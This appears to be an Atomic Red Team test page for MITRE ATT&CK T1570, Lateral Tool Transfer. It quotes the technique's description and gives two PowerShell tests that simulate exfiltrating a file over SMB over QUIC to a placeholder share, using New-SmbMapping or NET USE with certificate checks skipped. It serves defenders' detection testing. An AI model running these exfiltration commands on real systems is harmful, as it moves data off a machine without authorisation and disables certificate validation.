# T1570 - Lateral Tool Transfer

## Description from ATT&CK

> Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.
> 
> Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)
> 
> Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)

[Source](https://attack.mitre.org/techniques/T1570)

## Atomic Tests

- [Atomic Test #1: Exfiltration Over SMB over QUIC (New-SmbMapping)](#atomic-test-1-exfiltration-over-smb-over-quic-new-smbmapping)
- [Atomic Test #2: Exfiltration Over SMB over QUIC (NET USE)](#atomic-test-2-exfiltration-over-smb-over-quic-net-use)

### Atomic Test #1: Exfiltration Over SMB over QUIC (New-SmbMapping)

Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
Prerequisites:
  - A file server running Windows Server 2022 Datacenter: Azure Edition
  - A Windows 11 computer
  - Windows Admin Center

**Supported Platforms:** Windows

**auto_generated_guid:** `d8d13303-159e-4f33-89f4-9f07812d016f`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | The UNC path to the share on the file server | string | &#92;&#92;example.com&#92;sales|
| local_file | The local file to be transferred | path | C:&#92;path&#92;to&#92;file.txt|

#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
New-SmbMapping -RemotePath '#{remote_path}' -TransportType QUIC -SkipCertificateCheck
copy '#{local_file}' 'Z:\'
```

### Atomic Test #2: Exfiltration Over SMB over QUIC (NET USE)

Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
Prerequisites:
  - A file server running Windows Server 2022 Datacenter: Azure Edition
  - A Windows 11 computer
  - Windows Admin Center

**Supported Platforms:** Windows

**auto_generated_guid:** `183235ca-8e6c-422c-88c2-3aa28c4825d9`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | The UNC path to the share on the file server | string | &#92;&#92;example.com&#92;sales|
| local_file | The local file to be transferred | path | C:&#92;path&#92;to&#92;file.txt|

#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
NET USE * '#{remote_path}' /TRANSPORT:QUIC /SKIPCERTCHECK
copy '#{local_file}' '*:\'
```